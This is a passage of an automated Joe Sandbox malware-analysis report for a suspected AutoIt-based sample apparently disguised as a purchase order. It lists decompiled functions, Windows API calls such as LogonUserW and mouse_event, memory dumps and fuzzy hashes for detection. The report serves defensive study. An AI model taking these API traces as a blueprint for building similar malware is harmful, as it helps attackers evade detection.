                                                                                                              • Opcode ID: 4e8c13f12478a1647774e02d51131c97bc427f3ee50a4146d38409811e1c91b3
                                                                                                              • Instruction ID: a3c71020c349c1bad69d8f688e5429dae7f88e473a72156b5badf49aded9d405
                                                                                                              • Opcode Fuzzy Hash: 4e8c13f12478a1647774e02d51131c97bc427f3ee50a4146d38409811e1c91b3
                                                                                                              • Instruction Fuzzy Hash: 79E01235600215AFC700EB59D404996B7ECAFA9751F05C426EA45D7291DAB4E8048B91
                                                                                                              Function 004274E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0042750A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: mouse_event
                                                                                                              • String ID:
                                                                                                              • API String ID: 2434400541-0
                                                                                                              • Opcode ID: 12d1cd7d8b33ec44b32c836e1b62e305401c0c902bd659b76f0bb3bdae1dff53
                                                                                                              • Instruction ID: 7786ed5e35b77a74bb11637da0d38a6a3c3c4e0bccfa136a3bc787f23cc90090
                                                                                                              • Opcode Fuzzy Hash: 12d1cd7d8b33ec44b32c836e1b62e305401c0c902bd659b76f0bb3bdae1dff53
                                                                                                              • Instruction Fuzzy Hash: BED09EA476C62579ED191B24BC1BFB75508F304781FD4455BB603D95C1B8DC6D42A03E
                                                                                                              Function 0041B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0041AD3E), ref: 0041B124
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LogonUser
                                                                                                              • String ID:
                                                                                                              • API String ID: 1244722697-0
                                                                                                              • Opcode ID: dde723793bde01ca028171319d9a77aba62717d56036030641312d19aeaf4509
                                                                                                              • Instruction ID: f508b25f6d8f824f93e5550273012868950fb8e10e67fe3f519052699571168a
                                                                                                              • Opcode Fuzzy Hash: dde723793bde01ca028171319d9a77aba62717d56036030641312d19aeaf4509
                                                                                                              • Instruction Fuzzy Hash: 7DD05E321A464EAEDF024FA4DC02EAE3F6AEB04700F408110FA11D50A0C671D531AB50
                                                                                                              Function 0045B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: NameUser
                                                                                                              • String ID:
                                                                                                              • API String ID: 2645101109-0
                                                                                                              • Opcode ID: 1b1c6bee29a17e27ad68f2f48c937a27e74e5891e4f072b78a9cb43e531c143e
                                                                                                              • Instruction ID: 3d9aab2fb18e96d69c9f2b447a37dcde103bc0f559736778317b1466a32513fb
                                                                                                              • Opcode Fuzzy Hash: 1b1c6bee29a17e27ad68f2f48c937a27e74e5891e4f072b78a9cb43e531c143e
                                                                                                              • Instruction Fuzzy Hash: B7C04CB1800109DFC751CFC0CD449EEB7BCAB08305F1041A2D105F2110D7749B459B77
                                                                                                              Function 00408189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0040818F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                              • String ID:
                                                                                                              • API String ID: 3192549508-0
                                                                                                              • Opcode ID: b7ed5b710019607225bf0e46d923db04d22158f2927e222b655701c00f7b11d6
                                                                                                              • Instruction ID: 2325d13f12b1329e2e2206243354ab9972ae11181e242e6684eb488505eaba7b
                                                                                                              • Opcode Fuzzy Hash: b7ed5b710019607225bf0e46d923db04d22158f2927e222b655701c00f7b11d6
                                                                                                              • Instruction Fuzzy Hash: 59A0113080020CAB8F002B82EC088883F2CEA002A0B000030F80C00220ABA2A8A08A8A
                                                                                                              Function 003E93F0 Relevance: .5, Instructions: 531COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 137a506aa6261d28fe45dc173f65acd9f9bce2567332e4f6ce9c9b702709cc8d
                                                                                                              • Instruction ID: 9fbe75ac46f4fe231103ad7b16bd15abe487fc5c2a15a9e95638a454ca0aefd4
                                                                                                              • Opcode Fuzzy Hash: 137a506aa6261d28fe45dc173f65acd9f9bce2567332e4f6ce9c9b702709cc8d
                                                                                                              • Instruction Fuzzy Hash: B612B070A00219DFDF05DFA6DA81AEEB7F5FF49300F10462AE806E7291EB35A914CB54
                                                                                                              Function 003EE3E3 Relevance: .5, Instructions: 521COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1be80c88cf7e3b2dd9a37d7e8e799322830f90cd6c30f58ca1c77ffcd9bdd653
                                                                                                              • Instruction ID: 4b7e0ca9804a27df8a6b648aa9beda40ebae516bf9878953786c7566b3e81c89
                                                                                                              • Opcode Fuzzy Hash: 1be80c88cf7e3b2dd9a37d7e8e799322830f90cd6c30f58ca1c77ffcd9bdd653
                                                                                                              • Instruction Fuzzy Hash: 3D12D170900269CFDB26DF56D480ABEB7B0FF14304F15827AD94AAB391E335AD85CB91
                                                                                                              Function 003EAF50 Relevance: .5, Instructions: 514COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Exception@8Throwstd::exception::exception
                                                                                                              • String ID:
                                                                                                              • API String ID: 3728558374-0
                                                                                                              • Opcode ID: bdf05207529117623dd211bfc61464ba760ce02bf2c1bd672950ba0fcb0ca333
                                                                                                              • Instruction ID: 9ad3f66851a285823cd20b952df222569122de7a0bbebc6d2a28c16ab37e208e
                                                                                                              • Opcode Fuzzy Hash: bdf05207529117623dd211bfc61464ba760ce02bf2c1bd672950ba0fcb0ca333
                                                                                                              • Instruction Fuzzy Hash: 0D02D070A00119DFCF06DF65DA81AAEB7B5FF45300F10806AE806EB296EB74DE15CB95
                                                                                                              Function 004002A4 Relevance: .3, Instructions: 345COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                              • Instruction ID: 9a6c9845372738672ea76e8050e728b7d1301144bb6edd8ee7b97411a6a1957d
                                                                                                              • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                              • Instruction Fuzzy Hash: C0C1B1322051970EDB2E863A843453FBAA15EA27B171A077ED8B2DB5D1EF34C534D624
                                                                                                              Function 004006D9 Relevance: .3, Instructions: 341COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                              • Instruction ID: 43dd0b3b2cde5f5783abcf00efd0afc39208b22024b542f35179fa9d1cbbe962
                                                                                                              • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                              • Instruction Fuzzy Hash: 7CC1C1322051970EDF2E463A843463FBAA15EA2BB171B077ED8B2DB5D5EF24C534D620
                                                                                                              Function 003FFA57 Relevance: .3, Instructions: 323COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                              • Instruction ID: 47487fc2a0713659bb92456050163555af821ff8c207127eee29fdbf160ab0c7
                                                                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                              • Instruction Fuzzy Hash: 6EC16F3220909B0DDF2E463A847443EBAA15EA2BB531B177DEDB2CB5D5EE20C574D620
                                                                                                              Function 0043A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DeleteObject.GDI32(00000000), ref: 0043A2FE
                                                                                                              • DeleteObject.GDI32(00000000), ref: 0043A310
                                                                                                              • DestroyWindow.USER32 ref: 0043A31E
                                                                                                              • GetDesktopWindow.USER32 ref: 0043A338
                                                                                                              • GetWindowRect.USER32(00000000), ref: 0043A33F
                                                                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0043A480
                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0043A490
                                                                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A4D8
                                                                                                              • GetClientRect.USER32(00000000,?), ref: 0043A4E4
                                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0043A51E
                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A540
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A553
                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A55E
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0043A567
                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A576
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0043A57F
                                                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A586
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0043A591
                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A5A3
                                                                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0046D9BC,00000000), ref: 0043A5B9
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0043A5C9
                                                                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0043A5EF
                                                                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0043A60E
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A630
                                                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043A81D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                                              • API String ID: 2211948467-2373415609
                                                                                                              • Opcode ID: 1ead1d624081e75ad4b68c92d96105f46f65b5566c50e9711399bd7af7709deb
                                                                                                              • Instruction ID: e2292e154dbfa130ff9589bf625a57393f037d0141d9f63002f00fa88ae03212
                                                                                                              • Opcode Fuzzy Hash: 1ead1d624081e75ad4b68c92d96105f46f65b5566c50e9711399bd7af7709deb
                                                                                                              • Instruction Fuzzy Hash: 12029B75A00214EFDB14DFA5CD89EAE7BB9FB49310F008129F905AB2A0D774ED41CB69
                                                                                                              Function 0044D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0044D2DB
                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0044D30C
                                                                                                              • GetSysColor.USER32(0000000F), ref: 0044D318
                                                                                                              • SetBkColor.GDI32(?,000000FF), ref: 0044D332
                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0044D341
                                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0044D36C
                                                                                                              • GetSysColor.USER32(00000010), ref: 0044D374
                                                                                                              • CreateSolidBrush.GDI32(00000000), ref: 0044D37B
                                                                                                              • FrameRect.USER32(?,?,00000000), ref: 0044D38A
                                                                                                              • DeleteObject.GDI32(00000000), ref: 0044D391
                                                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0044D3DC
                                                                                                              • FillRect.USER32(?,?,00000000), ref: 0044D40E
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0044D439
                                                                                                                • Part of subcall function 0044D575: GetSysColor.USER32(00000012), ref: 0044D5AE
                                                                                                                • Part of subcall function 0044D575: SetTextColor.GDI32(?,?), ref: 0044D5B2
                                                                                                                • Part of subcall function 0044D575: GetSysColorBrush.USER32(0000000F), ref: 0044D5C8
                                                                                                                • Part of subcall function 0044D575: GetSysColor.USER32(0000000F), ref: 0044D5D3
                                                                                                                • Part of subcall function 0044D575: GetSysColor.USER32(00000011), ref: 0044D5F0
                                                                                                                • Part of subcall function 0044D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0044D5FE
                                                                                                                • Part of subcall function 0044D575: SelectObject.GDI32(?,00000000), ref: 0044D60F
                                                                                                                • Part of subcall function 0044D575: SetBkColor.GDI32(?,00000000), ref: 0044D618
                                                                                                                • Part of subcall function 0044D575: SelectObject.GDI32(?,?), ref: 0044D625
                                                                                                                • Part of subcall function 0044D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0044D644
                                                                                                                • Part of subcall function 0044D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0044D65B
                                                                                                                • Part of subcall function 0044D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0044D670
                                                                                                                • Part of subcall function 0044D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0044D698
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                              • String ID:
                                                                                                              • API String ID: 3521893082-0
                                                                                                              • Opcode ID: db8b5b5e5468d3bb3e3a2e724de2aac793aea1bc3a47e390ad6891cf5b56e88b
                                                                                                              • Instruction ID: f537bfa0447830d1f3974ed259393e852b27c260fb8945b61014efbd137d00c1
                                                                                                              • Opcode Fuzzy Hash: db8b5b5e5468d3bb3e3a2e724de2aac793aea1bc3a47e390ad6891cf5b56e88b
                                                                                                              • Instruction Fuzzy Hash: A9919F71D08301BFD7109F64DC08A6BBBA9FF89325F100A29F962961E0E7B5D944CB57
                                                                                                              Function 003FB8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DestroyWindow.USER32 ref: 003FB98B
                                                                                                              • DeleteObject.GDI32(00000000), ref: 003FB9CD
                                                                                                              • DeleteObject.GDI32(00000000), ref: 003FB9D8
                                                                                                              • DestroyIcon.USER32(00000000), ref: 003FB9E3
                                                                                                              • DestroyWindow.USER32(00000000), ref: 003FB9EE
                                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045D2AA
                                                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0045D2E3
                                                                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0045D711
                                                                                                                • Part of subcall function 003FB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003FB759,?,00000000,?,?,?,?,003FB72B,00000000,?), ref: 003FBA58
                                                                                                              • SendMessageW.USER32 ref: 0045D758
                                                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0045D76F
                                                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0045D785
                                                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0045D790
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 464785882-4108050209
                                                                                                              • Opcode ID: 7c80487bb438f9bd67a3f22bfac26aa477efc003894b0c1b4bc7f408bbfed3a9
                                                                                                              • Instruction ID: 8be819459a5c51d67de8bf57f5c8df279c8126dde6453bf378326b457ec5142d
                                                                                                              • Opcode Fuzzy Hash: 7c80487bb438f9bd67a3f22bfac26aa477efc003894b0c1b4bc7f408bbfed3a9
                                                                                                              • Instruction Fuzzy Hash: E112B170A04205EFDB21CF14C984BBAB7E4FF09306F14456AEA89CB652C775EC4ACB56
                                                                                                              Function 0042DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0042DBD6
                                                                                                              • GetDriveTypeW.KERNEL32(?,0047DC54,?,\\.\,0047DC00), ref: 0042DCC3
                                                                                                              • SetErrorMode.KERNEL32(00000000,0047DC54,?,\\.\,0047DC00), ref: 0042DE29
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
